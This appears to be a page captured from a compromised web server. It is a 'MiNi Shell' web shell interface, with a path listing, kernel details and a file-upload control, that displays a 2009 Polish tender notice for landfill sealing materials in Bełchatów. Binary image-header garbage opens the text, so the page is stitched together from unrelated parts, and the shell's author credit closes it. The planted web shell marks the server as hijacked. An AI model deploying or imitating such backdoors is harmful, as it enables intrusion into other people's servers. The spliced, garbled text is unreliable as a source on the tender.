JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090325/54875-N-2009.html

<p class="kh_header"><b>Bełchatów: Rozbudowa regionalnego składowiska odpadów innych niż niebezpieczne i obojętne w Woli Kruszyńskiej gm. Bełchatów. Dostawa materiałów :  folia z polietylenu PEHD , bentomaty, geowłókniny, rur drenarskich PEHD,rur i  studnia odcieków.</b><br>
<b>Numer ogłoszenia: 54875 - 2009; data zamieszczenia: 25.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Komunalne SANIKOM Sp. z o.o. , ul. Staszica 5, 97-400 Bełchatów, woj. łódzkie, tel. 044 6350905, faks 04 6350905.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa regionalnego składowiska odpadów innych niż niebezpieczne i obojętne w Woli Kruszyńskiej gm. Bełchatów. Dostawa materiałów :  folia z polietylenu PEHD , bentomaty, geowłókniny, rur drenarskich PEHD,rur i  studnia odcieków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Szczegółowy zakres dostawy asortymentów: 

2.1 Folia z polietynu PEHD o grubości 2mm obustronnie gładka -  w ilości 18500,0 m2

Warstwa izolacyjna wykonana zostanie z gładkiej  folii PEHD grubości 2 mm i gwarantowanej szczelności na min 20 lat

2.2 Geowłóknina - włóknina syntetyczna 800 g/m2  - 25 000,0 m2				    
2.3 Bentomata. - 

2.3.1 Bentomata w ilości  - 18.500 m2
Zastosowana mata bentonitowa musi spełniać warunki:
- współczynnik filtracji K mniejszy lub równy 1× 10minus 9m/s o nominalnej zawartości bentonitu
5 kg/m2. 
2.3.2 Proszek bentonitowy - w ilości 500 kg

2.4 Rury drenarskie
2.4.1 Rury PEHD fi 315 mm  dwuścienne z nasuwką perforowane - 275 mb
2.4.2 Rury PEHD fi 150/180 mm dwuścienne z nasuwką perforowane  - 382 ,0 mb
2.4.3 Kształtki kanalizacyjne zewnętrzne 2 kielichowe  z uszczelką fi 315 mm - 18 szt.
2.4.4 Złączki PEHD fi 315 mm do rur dwuściennych 50 sztuk

2.5 Rury 
2.5.1 Rury PEHD fi 315 mm dwuścienne pełne - 32,0 mb
2.5.2 Rury PEHD fi 900/1000 mm studnia odgazowująca  - 5 kompletów ( wg rysunku)
2.5.3 Rury PEHD fi 900/1000 mm studnia odwadniająca  - 1 komplet ( wg. rysunku)
2.5.4 Rury PEHD fi 110 mm  pełna  - 45,0mb ( łączenie kołnierzowe )
2.5.5 Rury PEHD fi 160 mm - 42,0 mb ( łączenie kołnierzowe) 

UWAGA:
Zamawiający zastrzega sobie możliwość wymiany lub zamiany określonych kształtek, złączek oraz rur zgodnie z zapotrzebowaniem podczas prac budowlanych. Wszystkie zamiany lub wymiany w/w elementów rozliczone zostaną osobnym protokółem podpisanym przez dostawcę i zamawiającego. 
W przypadku braku określonego materiału zamawiający domówi niezbędną ilość a dostawca dostarczy na wskazane miejsce.
W przypadku pozostania pewnej ilości materiału dostawca odbierze od zamawiającego wskazaną ilość i rodzaj pomniejszając swoją należność lub stosując zwrot finansowy.

3.    Wymagania dotyczące właściwości wyrobów budowlanych.

3.1 Materiały i wyroby stosowane powinny spełniać wymagania stawiane przez Prawo budowlane art. 5 ust. 7 oraz dokumentację projektową.

3.2 Dostawca  zapewni prawidłowy transport i właściwe składowanie materiałów i wyrobów na placu budowy.

3.3 Materiały dostarczone przez wykonawcę na plac budowy, które nie uzyskają akceptacji inspektora nadzoru inwestorskiego muszą być niezwłocznie usunięte z placu budowy. 


4.  Kontrola, badania i odbiór wyrobów budowlanych.

4.1 Dostawca jest odpowiedzialny za pełną kontrolę dostawy , jakości wyrobów budowlanych, zapewnienia odpowiedniego system kontroli oraz możliwości pobierania próbek i badania materiałów. Częstotliwość prowadzenia pomiarów i badań materiałów musi gwarantować wykonanie robót zgodnie z wymaganiami zawartymi w dokumentacji projektowej i specyfikacji technicznej. 

4.2 Próbki  pobierać należy losowo. Inspektor nadzoru inwestorskiego musi uczestniczyć w pobieraniu próbek. 

4.3 Badania i pomiary muszą być prowadzone zgodnie z wymaganiami norm.  Brak procedur w normach upoważnia Dostawcę do stosowania innych procedur zaakceptowanych przez inspektora nadzoru inwestorskiego. 

4.4 Inspektor nadzoru inwestorskiego jest uprawniony do dokonywania kontroli pobierania próbek i badania materiałów u źródła ich wytwarzania, a Dostawca zapewni wszelką potrzebną pomoc w tych czynnościach. 

4.5 Dostawca przygotuje na dzień odbioru dokumenty związane z dostarczonymi materiałami: atesty, świadectwa jakości, certyfikaty, karty gwarancyjne.


5.  Przygotowanie zakupu w oparciu o projekt:
   Biuro projektów:
   Przedsiębiorstwo Inżynieryjno Usługowe
  INŻYNIERIA PRO-EKO Spółka z o.o.
   ul. Ciołka 11A , 01-445 Warszawa, tel./fax (0-22) 837-77-50

6. Autorzy projektu:
- branża konstr. -budowlana mgr inż. Edward Ciemuchowski ,       zagospodarowanie terenu, drogi i place, ogrodzenie;
-  mgr inż. Artur Soczyński - melioracje - ukształtowanie terenu;
- branża sanitarna, melioracje inż. Ryszard Kalicki oraz mgr inż. Artur  Soszyński zagospodarowanie terenu, technologia składowiska, uszczelnienie, odwodnienie  i odgazowanie, pompowania ze zbiornikiem retencyjnym;
-  branża elektryczna -inż. Waldemar Puchalski, zasilenie elektryczne, sterowanie;
-  sprawdzający mgr inż. Grzegorz Stodolski - elektryczna - zasilenie elektryczne, sterowanie;
- sprawdzający mgr inż. Lesław Dindorf - sanitarna - zagospodarowanie terenu, technologia, uszczelnienie, odwodnienie, odgazowanie;

7 Akty prawne

7.1  Ustawa Prawo budowlane - Dz.U. Nr. 207 z 2003 r.poz.2016 z póź.zm.
7.2  Ustawa Prawo ochrony środowiska  -Dz.U.Nr 62z poz 627 z póź.zm. 
7.3 Rozporządzenie Ministra Infrastruktury z dnia 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych, wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego.Dz.U.Nr 202,poz.2072
7.4 Aprobaty techniczne, normy.

7.4.1  Aprobata Techniczna  ITB  AT-15-4184/2000 - Geowłókniny Polyfelt
7.4.2 Aprobata Techniczna  ITB AT-15-3944/2002 Maty bentonitowe Bentomat
7.4.3  Aprobata Techniczna IBDiM  Nr AT/2001-04-1185  Mata bentonitowa Bentomat  
7.4.4  Aprobata Techniczna CNTK  AT/09-2005-0088-00  Bentomat
7.4.5  Aprobata Techniczna ITB AT 15-3472/2004  Geochron
7.4.6  Aprobata Techniczna IBDiM  AT - 99-04- 0675 Geochron
7.4.7  PN-ISO 9862:1994 Geotekstylia. Pobieranie próbek laboratoryjnych i przygotowanie próbek do badań
7.4.8 PN-en 964-1:1999 Geotekstylia i wyroby pokrewne. Wyznaczanie grubości przy określonych naciskach. Warstwy  pojedyńcze 
7.4.9 PN-EN 965:199   Geotekstylia i wyroby pokrewne. Wyznaczenie masy powierzchniowej
7.4.10 PN-ISO 10319:1996 Geotetstylia. Badania wytrzymałości na rozcinanie metodą szerokich próbek
7.4.11 PN-ISO 10318:1993 Geotekstylia. Terminologia
7.4.12 PN-EN ISO 12236:1998 Geotekstylia i wyroby pokrewne. Badania na przebicie statystyczne (metoda CBR)
7.4.13 PN-EN 918:1999 Geotekstylia i wyroby pokrewne. Wyznaczenie wytrzymałości na dynamiczne przebicie (metoda spadającego stożka).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 44.17.40.00-0, 35.12.15.00-3, 44.16.31.00-1, 44.16.31.10-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy,  którzy:
1.Spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
      1.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności oraz 
             nie podlegają wykluczeniu na podstawie art.24 ustawy Prawo zamówień
             publicznych.
             Opis kryteriów oceny spełnienia warunku: 
            - posiadają uprawnienia do wykonywania określonej działalności lub czynności oraz 
              nie podlegają wykluczeniu na podstawie art.24 ustawy Prawo zamówień
              publicznych.
             Informacja o dokumentach potwierdzających spełnienie warunku: 
            a) aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do  
     ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do   
     rejestru  lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie   
     wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o 
     dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania 
              ofert;
            b)aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w 
              art.24ust.1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
            c)aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 
               ust.1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem  
               terminu składania ofert.
d)aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem podatków,  opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściciela organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania
               ofert.


        1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
          technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią  
          pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  
          technicznego i osób zdolnych do wykonania zamówienia.
          
Informacja o dokumentach potwierdzających spełnianie warunku:
a) oświadczenie wykonawcy o spełnieniu warunków z art. 22 ust.1 ustawy Prawo zamówień publicznych - złożone w ramach pkt. VII ppkt 1 SIWZ.
b) oświadczenie o wykonaniu i dostarczeniu materiałów zgodnych z warunkami technicznymi zamówienia.

 1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie   
    zamówienia.
             Opis kryteriów oceny spełnienia warunku: 
              - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  
                Zamówienia - stosowne oświadczenie.
              - posiadają aktualne w dacie złożenia oferty ubezpieczenie od odpowiedzialności  
               cywilnej w zakresie prowadzonej działalności gospodarczej.
             Informacja o dokumentach potwierdzających spełnienie warunku
a) polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca 
    jest ubezpieczony od odpowiedzialności cywilnej zgodnej z przedmiotem prowadzonej działalności.
b)  oświadczenie o posiadaniu środków finansowych do realizacji zamówienia, wraz z bilansem za 12-cu 2008 roku,/ sprawozdaniem F01- przekazanym do Urzędu Statystycznego za 2008 rok, 

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń metodą spełnia lub nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.   oświadczenie wykonawcy o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo 
                 zamówień  publicznych, (art. 44 ustawy  Pzp ).
    2.    formularz ofertowy zgodny z załączonym wzorem ( załącznik nr 1)
3.	 jeżeli wykonawca przewiduje udział  podwykonawców określi rzeczowo-   
            finansowy zakres usług, które zamierza  powierzyć do realizacji 
            podwykonawcom, załączając stosowne oświadczenie.
4.	wszystkie dokumenty wymagane dla potwierdzenia spełnienia warunków 
          stawianych wykonawcom, zgodnie z pkt VI specyfikacji.
	5.    Oświadczenie o zapoznaniu i przyjęciu SIWZ  ( załącznik nr 3 ) 
     
          Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium     
          Rzeczypospolitej Polskiej dokumenty, o  których  mowa  w   pkt. VI specyfikacji,    
           zastępuje się je odpowiednimi dokumentami, zgodnie z Rozporządzeniem Prezesa  
          Rady Ministrów z dnia 19 maja 2006r w sprawie rodzajów dokumentów, jakich może 
          żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być 
          składane ( Dz. U. z  2006r., Nr 87 poz. 605 z późn. zm.).  

	Dokumenty w/w powinny zostać złożone w formie oryginału lub kserokopii	poświadczonej za zgodność z oryginałem, przez wykonawcę na każdej stronie 
    zawierającej informacje..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sanikom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nazwa: Przedsiębiorstwo Komunalne SANIKOM Sp. z o.o.
Adres: ul Staszica 5 Bełchatów 97-400
Telefon: (O -44) 635-09-05
Telefaks: (O -44) 635-09-06
REGON: 59216606
NIP: 769-196-75-75
www.sanikom.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 12:45, miejsce: Nazwa: Przedsiębiorstwo Komunalne SANIKOM Sp. z o.o.
Adres: ul Staszica 5 Bełchatów 97-400
Telefon: (O -44) 635-09-05
Telefaks: (O -44) 635-09-06
sekretariat Spółki pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com